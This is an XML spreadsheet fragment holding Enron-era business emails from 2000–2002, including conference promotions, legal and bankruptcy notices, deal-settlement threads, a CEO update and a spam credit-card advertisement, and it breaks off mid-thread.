    <t xml:space="preserve"> &lt;http://rs6.net/on.jsp?t=1010952455769.1010945481275&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif&gt;_x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00002.gif&gt;	_x000D_
Power Markets 2002: Risk and Reward_x000D_
April 17-18, 2002 ? Excalibur Hotel ? Las Vegas, NV_x000D_
Click Here to Download a Complete Conference Brochure &lt;http://www.pmaconference.com/markets2002.pdf&gt;	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00003.gif&gt;	_x000D_
We will see record numbers of new powerplants coming on line this year. New, much larger RTOs promise dramatic increases in liquidity. The Enron fallout will continue to force balance sheet improvements-- perhaps more mergers and acquisitions. Price volatility will continue, and risk management techniques will continue to be honed.	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00004.gif&gt;	_x000D_
Transmission and RTOs_x000D_
Representatives from PJM, Cal ISO and Midwest ISO on their respective regions. _x000D_
_x000D_
Insurance_x000D_
Scott Ettien from NCM, Lynda Clemmons from Element Re and Pat Toner Goudarzi from ACE, on Credit Insurance, Weather-risk Insurance and Innovative Insurance Products, respectively _x000D_
_x000D_
Exchanges_x000D_
Monte Simpson of InterContinental Exchange and Brad Leach of NYMEX on the growth in the use of exchanges. Credit_x000D_
Susan Abbott of Moody's on evolving credit standards in our industry _x000D_
_x000D_
Markets_x000D_
Chris Pollatos of Mirant, Dave Freeman of Panda and Mike Young of Aquila on the state of various aspects of the power markets. _x000D_
_x000D_
And More!_x000D_
Cabell Poindexter of Wyndham Mills on job prospects! John OBrien of Skipping Stone on the outlook for Transmission! Henwood on outlook for powerplant construction! Adrian Palmer of Caminus Corp on European Markets! _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00005.gif&gt;	_x000D_
Mirant Americas Energy Marketing_x000D_
Panda Energy_x000D_
Aquila, Inc._x000D_
Moody's Investor Services_x000D_
Skipping Stone_x000D_
NYMEX_x000D_
California ISO	 ICE _x000D_
NCM Americas_x000D_
Henwood Energy Services_x000D_
Element Re_x000D_
Caminus Corporation_x000D_
Wyndham Mills International 	_x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00006.gif&gt;	_x000D_
On April 16, Scott Spiewak will be repeating his "Fundamentals of Power Marketing" preconference seminar. Essential for the new industry participant, it is also a valuable overview for the industry professional.	 _x000D_
  &lt;http://www.pmaconference.com/imagesemail/id000048/id00007.gif&gt;	_x000D_
Click Here to Download a Complete Conference Brochure &lt;http://www.pmaconference.com/markets2002.pdf&gt;	 _x000D_
This email was sent to shelley.corman@enron.com, at your request, by PowerMarketers.com &lt;http://rs6.net/tn.jsp?t=zsrmxqn6.8rwxqqn6.9arrsqn6&amp;p=http%3A%2F%2Fwww.PowerMarketers.com&gt;. _x000D_
Visit our Subscription Center to edit &lt;http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=shelley.corman@enron.com&gt; your interests or unsubscribe &lt;http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=shelley.corman@enron.com&gt;. _x000D_
View our privacy policy &lt;http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp&gt;. _x000D_
_x000D_
Powered by _x000D_
Constant Contact &lt;http://www.constantcontact.com/index.jsp?cc=tccst&gt; </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 10:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Business Plan</t>
  </si>
  <si>
    <t>Dave_x000D_
_x000D_
Find enclosed the business plan and the valuation model for DealBench.  Feel _x000D_
free to call me with questions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Harry Arora</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 09:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Brazos Cert Filing</t>
  </si>
  <si>
    <t xml:space="preserve">LLGM_x000D_
_x000D_
_x000D_
_x000D_
	Dan Lyons_x000D_
	07/31/2000 04:31 PM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: Mark E Haedicke/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT_x000D_
		 Subject: Brazos Cert Filing_x000D_
_x000D_
They are pursuing the QF case to the Supremes....are we going to recommend _x000D_
that Pnderosa Pine retain either LLGM or VE on this? It is primarily a FERC _x000D_
issue and I don't know whether you want to go with VE for the litigation _x000D_
expertise or LLGM fror the FERC expertise...I expect that we are going to get _x000D_
asked about this by our commercial people fairly quickly_x000D_
----- Forwarded by Dan Lyons/HOU/ECT on 07/31/2000 04:27 PM -----_x000D_
_x000D_
	fordb@winstim.com_x000D_
	07/31/2000 03:13 PM_x000D_
		 _x000D_
		 To: kneisler@llgm.com_x000D_
		 cc: Tmoore@llgm.com, dan.lyons@enron.com, rquinn@tenaska.com_x000D_
		 Subject: Brazos Cert Filing_x000D_
_x000D_
_x000D_
Kirsten,_x000D_
_x000D_
As I mentioned to you this morning by phone, we are advised that Brazos _x000D_
Electric_x000D_
Power Cooperative filed a cert. petition on Friday with respect to the  Fifth_x000D_
Circuit decision in the QF case.  We will send the papers to you (or to _x000D_
whomever_x000D_
Enron or Ponderosa designates) when they come in._x000D_
_x000D_
I believe that someone in our D.C. office has informed the Solicitor General's_x000D_
office that we no longer represent the partnership.  However, I don't think it_x000D_
will not be necessary for us to file a withdrawal as counsel for the _x000D_
partnership_x000D_
since the cert petition starts a new proceeding._x000D_
_x000D_
Regards,_x000D_
_x000D_
Bart_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_______________________________________x000D_
This message, together with any attachments, is intended only for the_x000D_
use of the individual or entity to which it is addressed and may contain_x000D_
information that is legally privileged, confidential and exempt from_x000D_
disclosure.  If you are not the intended recipient, you are hereby_x000D_
notified that any dissemination, distribution, or copying of this_x000D_
message,or any attachment, is strictly prohibited.  If you have received_x000D_
this message in error, please notify the original sender (or the WSPR_x000D_
Help Desk) immediately by telephone (212-858-1000) or by return_x000D_
E-mail and delete the message, along with any attachments, from_x000D_
your computer.  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 14:45:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dl-ga-all_enron_worldwide3@enron.com'})</t>
  </si>
  <si>
    <t>Notice to Employees of Bankruptcy Court Order</t>
  </si>
  <si>
    <t>This is to inform you that on January 25, 2002 the Honorable Arthur Gonzalez, United States Bankruptcy Judge for the Southern District of New York, entered an order as follows:_x000D_
_x000D_
It is hereby Ordered that until further Order of this Court, Enron Corp., its affiliated debtors-in-possession in these jointly administered chapter 11 proceedings (collectively "Enron"), and Enron's employees shall preserve, and refrain from destroying or disposing of, any of Enron's records, either in electronic or paper form._x000D_
_x000D_
Obviously, any violation of this order will carry serious consequences.  We know that we can depend on you to comply with it fully._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 05:53:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Personnel Information</t>
  </si>
  <si>
    <t>Info you wanted._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hill, Jo Ann  _x000D_
Sent:	Tuesday, October 02, 2001 4:40 PM_x000D_
To:	Steffes, James D._x000D_
Subject:	RE: Personnel Information_x000D_
_x000D_
Hi Jim -- I'm showing that Dan is under a 3-year agreement which expires on 6/12/02.  Please let me know if you need additional information._x000D_
Thanks._x000D_
Jo Ann_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Tuesday, October 02, 2001 4:06 PM_x000D_
To:	Hill, Jo Ann_x000D_
Subject:	Personnel Information_x000D_
_x000D_
Jo Ann --_x000D_
_x000D_
Do you know if Dan Staines has an active Employment Contract?_x000D_
_x000D_
JIm</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 12:23:49 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
This has been a tough couple of weeks.  I hope that these daily communications on new developments are helping you understand what's happening with our company._x000D_
_x000D_
Here's a rundown of events from last week:_x000D_
_x000D_
	We executed a commitment letter with JPMorgan and Salomon Smith Barney that will provide us with additional secured credit lines worth $1 billion.  Our Northern Natural Gas Company and Transwestern Pipeline Company will support these assets.  We now have received a total of $4 billion in credit lines, which we will use to pay off short-term commercial debt and maintain liquidity._x000D_
	Our Board of Directors elected a new member to the Board - William Powers, Jr., the dean of The University of Texas School of Law in Austin, Texas._x000D_
-	The Board also established a Special Committee, to be chaired by Dean Powers, that will conduct an in-depth review of the transactions between Enron and entities connected to related parties.  The committee is authorized to take any actions it deems appropriate._x000D_
	The Securities &amp; Exchange Commission (SEC) opened up a formal investigation into related party transactions that have been the subject of media reports and the subject of the SEC's formal inquiry.  As I've said before, we welcome this and look forward to working with the SEC to put this matter behind us._x000D_
      Moody's lowered our credit rating one level, from Baa1 to Baa2.  Standard &amp; Poor's (S&amp;P) lowered our credit rating one level, from BBB+ to BBB.  Fitch lowered our rating from BBB+ to BBB-.  All agency ratings are investment grade._x000D_
_x000D_
Even with what's happening with our company, we have kept running our business as usual, and here's few examples to show you that we are, indeed, doing just that:_x000D_
_x000D_
	EnronOnline did 5,866 transactions with 302 counterparties on Friday.  Transaction counts remain higher than average._x000D_
	EES signed a three-year fixed price agreement with Home Depot to supply power to 115 of its stores in California and 68 stores across Texas.  EES also has exclusive rights to develop energy management proposals for all Home Depot facilities west of the Mississippi._x000D_
      EES also signed a three-year energy management agreement with Memorial Sloan-Kettering Cancer Center's four New York City facilities._x000D_
_x000D_
Serious issues have been raised in the media and investment community that have put our credibility and reputation as a company in question.  We're taking an introspective look at our business dealings, our core values and our organization as a whole.  We're doing everything we can to deal with the issues that are affecting our company._x000D_
_x000D_
And that's where you come in.  Look around you.  Look at the excellence that you and your team represents.  That's the reason we hired you - you're the best.  Now, more than ever, work for Enron and especially for each other._x000D_
_x000D_
Thank you for your continuing support of our company and each other.</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 10:04:49 -0800 (PST)</t>
  </si>
  <si>
    <t>Address for DWR</t>
  </si>
  <si>
    <t>3310 El Camino (Sacramento).  Suite 120.</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 10:31:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott.dozier@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tom.donohoe@enron.com', 'bonnie.chang@enron.com', 'm..love@enron.com'})</t>
  </si>
  <si>
    <t>RE: CMS Deal #1027152</t>
  </si>
  <si>
    <t>I am not sure if they have confirmed either deal.  However, deal #1034254 was never pathed by us, whereas 1027152 was.  Therefore, nothing billed out under 1034254._x000D_
_x000D_
Bonnie - I am including you on this note in case you can add anything about the pathing of the two deals mentioned in this note.  Niether CMS orgaination shows anything on Trunkline that matches this.  We spoke briefly about this last week._x000D_
_x000D_
Phillip - I am including you in case you can add any clarity or determine who we did this deal(s) with._x000D_
_x000D_
Thank you,_x000D_
Scott_x000D_
5-7213_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donohoe, Tom  _x000D_
Sent:	Tuesday, October 23, 2001 12:02 PM_x000D_
To:	Dozier, Scott_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
_x000D_
if they are not confirming this deal are they confirming 1034254?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dozier, Scott  _x000D_
Sent:	Tuesday, October 23, 2001 9:24 AM_x000D_
To:	Donohoe, Tom_x000D_
Cc:	Valderrama, Lisa; McFatridge, Thomas_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
Importance:	High_x000D_
_x000D_
Tom,_x000D_
_x000D_
In contacting our scheduler and subsequently a CMS scheduler, neither CMS Field Services nor CMS Marketing, Services, and Trading are able to identify the deal.  Currently, I am preparing to fax a copy of our confirmation on the deal to CMS Field Services,  Again, it is not an executed copy, but I am assuming they may not have sent it back.  Furthermore, the CMS Field Services scheduler has told me that they don't even schedule any Trunkline deals._x000D_
_x000D_
Considering all of this, I am assuming the worst - that unless we can provide a trader name etc. they will short pay on this deal.  So, do you know who represented us with CMS on this deal any one that might know who their trader is or how this deal was booked?  We are getting ready to settle for Sep prod so any help asap would be appreciated._x000D_
_x000D_
Scott_x000D_
5-7213_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dozier, Scott  _x000D_
Sent:	Thursday, October 18, 2001 12:21 PM_x000D_
To:	Donohoe, Tom_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
_x000D_
They do not recognize that deal at all._x000D_
_x000D_
The most recent name and number is a Conoco trader.  I have a confirmation on this deal with CMS.  However, it is not an executed copy (i.e. sent back or confirmed by CMS).  Is there some one who represented us with CMS on this that might know who their trader is or how this deal was booked?  I will attempt to contact the scheduler in the mean time but any help would be good._x000D_
_x000D_
thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donohoe, Tom  _x000D_
Sent:	Thursday, October 18, 2001 11:44 AM_x000D_
To:	Dozier, Scott_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
_x000D_
I never talk to these people so the numbers I have are old. Do they not recognize this deal?  It was scheduled so I assume the counterparty is correct. I have another number for Mike at 281-293-2203.  It could be old also._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dozier, Scott  _x000D_
Sent:	Thursday, October 18, 2001 11:20 AM_x000D_
To:	Donohoe, Tom_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
_x000D_
Tom,_x000D_
_x000D_
The below number is for a Duke Energy trader.  So, either this deal is booked wrong or this is not the correct trader name.  Please advise._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donohoe, Tom  _x000D_
Sent:	Thursday, October 18, 2001 10:59 AM_x000D_
To:	Dozier, Scott_x000D_
Subject:	RE: CMS Deal #1027152_x000D_
_x000D_
Tony ? at 713-6276215_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dozier, Scott  _x000D_
Sent:	Thursday, October 18, 2001 10:10 AM_x000D_
To:	Donohoe, Tom_x000D_
Subject:	CMS Deal #1027152_x000D_
_x000D_
Tom,_x000D_
_x000D_
Please inform me of the CMS Field Services trader on deal #1027152 plus any additional information that you might have._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Scott Dozier_x000D_
Client Services - Settlements_x000D_
Enron Net Works LLC_x000D_
office: 713.345.7213_x000D_
fax: 713.646.8420_x000D_
email: scott.dozier@enron.com</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 04:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.walton@enron.com', 'robert.neustaedter@enron.com', 'tom.hoatson@enron.com', 'linda.noske@enron.com', 'lisa.yoho@enron.com', 'frank.rishe@enron.com', 'lysa.akin@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'vinio.floris@enron.com', 'chauncey.hood@enron.com', 'thane.twiggs@enron.com', 'jeff.brown@enron.com', 'scott.bolton@enron.com', 'xi.xi@enron.com', 'ron.mcnamara@enron.com', 'kathleen.sullivan@enron.com', 'harry.kingerski@enron.com', 'robert.frank@enron.com', 'susan.landwehr@enron.com', 'gloria.ogenyi@enron.com', 'sandra.mccubbin@enron.com', 'roy.boston@enron.com', 'joe.connor@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'stella.chan@enron.com', 'bill.moore@enron.com', 'michelle.belzak@enron.com', 'eric.benson@enron.com', 'steve.montovano@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'kirsten.bellas@enron.com', 'aleck.dadson@enron.com', 'allison.navin@enron.com', 'jean.dressler@enron.com', 'rebecca.cantrell@enron.com', 'robin.kittel@enron.com', 'elizabeth.linnell@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leslie.lawner@enron.com', 'mike.roan@enron.com', 'kathy.mongeon@enron.com', 'tracy.cooper@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'janel.guerrero@enron.com', 'carolyn.cooney@enron.com', 'christi.nicolay@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'richard.ingersoll@enron.com', 'tom.briggs@enron.com', 'terri.miller@enron.com', 'dave.mangskau@enron.com', 'robert.hemstock@enron.com', 'lindsay.meade@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'richard.shapiro@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'james.steffes@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'joe.hartsoe@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>RCR Meeting (Time Change for Monday, April 9)</t>
  </si>
  <si>
    <t>The RCR meeting for Monday, April 9 will take place at 2:00 PM (CDT) instead _x000D_
of 12:00 PM (CDT).  Please make note of this time change on your schedules.  _x000D_
The dial in number of 1-800-283-1805 will remain the same._x000D_
_x000D_
Thanks and call if you have any questions._x000D_
_x000D_
gngr</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 23:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Reg Risk Section for DASH of DWR</t>
  </si>
  <si>
    <t xml:space="preserve">Tracy --_x000D_
_x000D_
Here is our first draft.  I am checking with other Govt Affairs personnel to _x000D_
incorporate their thoughts._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Tracy Ngo@ECT_x000D_
	03/27/2001 07:11 PM_x000D_
		_x000D_
		 To: James D Steffes/NA/Enron@ENRON_x000D_
		 cc: William S Bradford/Enron@EnronXGate_x000D_
		 Subject: Re: Draft DASH of DWR_x000D_
_x000D_
That would be great.  The DASH format is ever-changing wrt to other moving _x000D_
parts so no worries.  -Thanks, Tracy_x000D_
_x000D_
_x000D_
_x000D_
From: James D Steffes@ENRON on 03/27/2001 05:18 PM_x000D_
To: Tracy Ngo/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Draft DASH of DWR  _x000D_
_x000D_
I'll have our comments first thing in the am.  Hope that is ok._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 12/29/2000 - MTM</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 03/21/2001 _x000D_
11:13 AM ---------------------------_x000D_
_x000D_
_x000D_
Carole Frank_x000D_
03/21/2001 11:05 AM_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: 12/29/2000 - MTM  _x000D_
_x000D_
Darron,_x000D_
_x000D_
The following are the totals for Tudor BVI and Ospraie.  The total MTM value _x000D_
for the West Desk are as follows.  Detail can be found in the attachment._x000D_
_x000D_
Notional Quantity: $5,650,000_x000D_
PV Quantity:  $5,477,056_x000D_
_x000D_
MTM Value:  -$3,768,104_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 19:26:05 -0800 (PST)</t>
  </si>
  <si>
    <t>Cooperation with the FBI</t>
  </si>
  <si>
    <t>_x000D_
Enron has consented to allow the Federal Bureau of Investigation to search the Enron Building and to interview employees regarding allegations of document destruction.  The company encourages all employees to fully cooperate with the FBI._x000D_
_x000D_
The company has retained Michael Levy and his law firm Swidler, Berlin, Shereff, Friedman, to advise any employee regarding this matter and to be present with them during any interviews by government investigators.  If you would like to speak with an attorney, please contact Ned Crady of the Legal Department at 3-4558 or contact Michael Levy's office in Washington, D.C. at 202-295-8414 and they will direct you to him here in Houston.</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 07:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Direct USA Product Descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">That makes sense.  Thanks.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Vicki Sharp@EES_x000D_
	05/31/2001 11:33 AM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Enron Direct USA Product Descriptions_x000D_
_x000D_
Mark, we are working with Ken Raisler to evaluate these products as an _x000D_
alternative to the other "swap" type product we talked about a few months _x000D_
ago.  Let me know if you want to stay in the loop on this at the development _x000D_
stage.  I  would suggest that we finalize with Raisler and then bring Carol _x000D_
in the loop.  _x000D_
_x000D_
Thanks. _x000D_
---------------------- Forwarded by Vicki Sharp/HOU/EES on 05/31/2001 11:30 _x000D_
AM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Vicki Sharp                           05/25/2001 10:43 AM_x000D_
	Phone No: 713 853-7413_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: raislerk@sullcrom.com_x000D_
cc: Mike D Smith/HOU/EES@EES _x000D_
Subject: Enron Direct USA Product Descriptions_x000D_
_x000D_
Ken, we will want to discuss these new products with you on our Tuesday _x000D_
call.  _x000D_
_x000D_
Thanks. _x000D_
---------------------- Forwarded by Vicki Sharp/HOU/EES on 05/25/2001 10:41 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Mike D Smith                           05/25/2001 10:10 AM_x000D_
	_x000D_
_x000D_
To: Vicki Sharp/HOU/EES@EES, James E Keller/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Enron Direct USA Product Descriptions_x000D_
_x000D_
Descriptions look pretty good to me.  Do we want to forward to Raisler before _x000D_
our Tues tele conf?_x000D_
---------------------- Forwarded by Mike D Smith/HOU/EES on 05/25/2001 10:10 _x000D_
AM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Chris Hendrix                           05/24/2001 05:02 PM_x000D_
	Phone No: 713 853-9215_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Vicki Sharp/HOU/EES@EES, James E Keller/HOU/EES@EES, Mike D _x000D_
Smith/HOU/EES@EES_x000D_
cc: Scott Gahn/HOU/EES@EES, James M Wood/HOU/EES@EES, Edward _x000D_
Hamb/HOU/EES@EES, John D Burrows/HOU/EES@EES _x000D_
Subject: Enron Direct USA Product Descriptions_x000D_
_x000D_
Attached is a narrative describing some of the products offered by Enron _x000D_
Direct USA.  We are seeking a legal opinion if these products are considered _x000D_
Swaps in the legal sense and will require the Swap Criteria language in the _x000D_
contract. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 15:34:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lpyzugpaueupllfk@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'glxyzgnasxdujiwc@yahoo.co.uk'})</t>
  </si>
  <si>
    <t>No fee! Accept Credit Cards in 2002!_x000D_
                                                   [f94eq]</t>
  </si>
  <si>
    <t xml:space="preserve">Start Accepting Credit Cards Today!_x000D_
_x000D_
  &lt;http://www.transportuniverse.com/images/cash.jpg&gt;_x000D_
Your business MUST be accepting Credit Cards from your customers!_x000D_
_x000D_
Over 97% of all sales on the Internet are done with Credit Cards._x000D_
_x000D_
Over 92% of mail orders and telephone-orders are done with Credit Cards._x000D_
_x000D_
If you don't take Credit Cards, 9 out of every 10 potential customers can't do business with you!_x000D_
_x000D_
We specialize in on-line businesses, mail order and telephone order businesses, start-ups, in-home businesses as well as retail locations._x000D_
_x000D_
* In other words, we specialize in YOUR business *_x000D_
_x000D_
_x000D_
Simply fill out this short application and _x000D_
a representative will contact you shortly._x000D_
_x000D_
 _x000D_
Applicant Information	 _x000D_
First Name:	  	_x000D_
Last Name:	  	_x000D_
Email Address:	  	_x000D_
Business Phone:	  	_x000D_
Home Phone:	  	_x000D_
Please place comments here_x000D_
  	_x000D_
 	_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Remove me! 	_x000D_
Email Address:	  	_x000D_
 	_x000D_
We honour every remove request, in 24-48 hours :) 	_x000D_
lpyzugpaueupllfk </t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 03:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron / HPL Actuals for February 2-4, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">February 2, 2001_x000D_
_x000D_
     Teco Tap       Nom. 30.000 ;  Actual 30.518 / Enron_x000D_
_x000D_
February 3, 2001_x000D_
_x000D_
     No Flow_x000D_
_x000D_
February 4, 2001_x000D_
_x000D_
     Teco Tap       Nom. 41.250 ; Actual 37.142 / Enron_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bruce.smith@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jenny.rub@enron.com', 'bob.mcauliffe@enron.com'})</t>
  </si>
  <si>
    <t>RE: Data Files Needed</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot find this path - I am going to forward this to Dan and ask that he _x000D_
get us the correct path and amount of files we are talking about._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Rub, Jenny  _x000D_
Sent: Tuesday, May 29, 2001 11:04 AM_x000D_
To: Sanders, Richard; McAuliffe, Bob; Smith, Bruce_x000D_
Subject: RE: Data Files Needed_x000D_
_x000D_
Bob/Bruce,  Will you please help Richard with this data request._x000D_
_x000D_
Richard,  Sorry I didn't respond sooner, I am out of the office.   _x000D_
_x000D_
JR_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Sanders, Richard  _x000D_
Sent: Friday, May 25, 2001 7:54 AM_x000D_
To: Rub, Jenny_x000D_
Subject: Data Files Needed_x000D_
_x000D_
I need to get the attached info to assist with the CA litigation. Who should _x000D_
I call?_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 05/25/2001 07:52 AM -----_x000D_
_x000D_
_x000D_
	"Fergus, Gary S." &lt;GFergus@brobeck.com&gt; 05/11/2001 05:27 PM 	   To: "Richard _x000D_
B. Sanders Esq. (E-mail)" &lt;richard.b.sanders@enron.com&gt;  cc:   Subject: Data _x000D_
Files Needed_x000D_
_x000D_
_x000D_
_x000D_
Richard,_x000D_
 Here are the specifics of what we need to get copied:_x000D_
_x000D_
M:\NAHOUTRD\Houston\Power\Common\Electric\West\Incremnt\2000_x000D_
_x000D_
We need all files copied from this directory.  These are the 2000 West Desk_x000D_
Real Time spread sheets._x000D_
_x000D_
Thanks_x000D_
Gary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Fri, 6 Apr 2001 10:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Energy Finance Conference presentations available</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/06/2001 _x000D_
05:38 PM ---------------------------_x000D_
_x000D_
_x000D_
"Angela Dorsey" &lt;Angela.Dorsey@bus.utexas.edu&gt; on 04/03/2001 03:12:14 PM_x000D_
To: _x000D_
cc:  _x000D_
Subject: Energy Finance Conference presentations available_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
FYI: _x000D_
You can now retrieve most all the speaker presentations of the 2001 Energy _x000D_
Finance Conference (Feb 22-23) from our website at _x000D_
http://cefer.bus.utexas.edu, with the exception of presentations made by John _x000D_
McCormack, Peter Nance, Sailesh Ramamurtie, and Ehud Ronn / Anoop Kapoor, _x000D_
which I hope to still receive._x000D_
_x000D_
Sincerely, _x000D_
Angela _x000D_
_x000D_
************** _x000D_
Angela Dorsey _x000D_
Assistant Director _x000D_
Center for Energy Finance Education &amp; Research _x000D_
The University of Texas at Austin _x000D_
Department of Finance, CBA 6.222 _x000D_
Austin, TX 78712 _x000D_
angela.dorsey@bus.utexas.edu _x000D_
************** _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 23:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>daily charts and matrices as hot links 5/15</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Distillate and unleaded charts to follow._x000D_
_x000D_
_x000D_
Crude     http://www.carrfut.com/research/Energy1/crude42.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas42.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG42.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG42.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL42.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 10:54:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>Can you email it to Chris Edmonds and Joe Wright today?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Monday, October 08, 2001 11:50 AM_x000D_
To:	Shults, Bob_x000D_
Subject:	RE: _x000D_
_x000D_
Thanks for the email.  I just got out of an all morning meeting.  I had already drafted the agreement for APB Europe.  I'll redraft it as directed._x000D_
_x000D_
 -----Original Message-----_x000D_
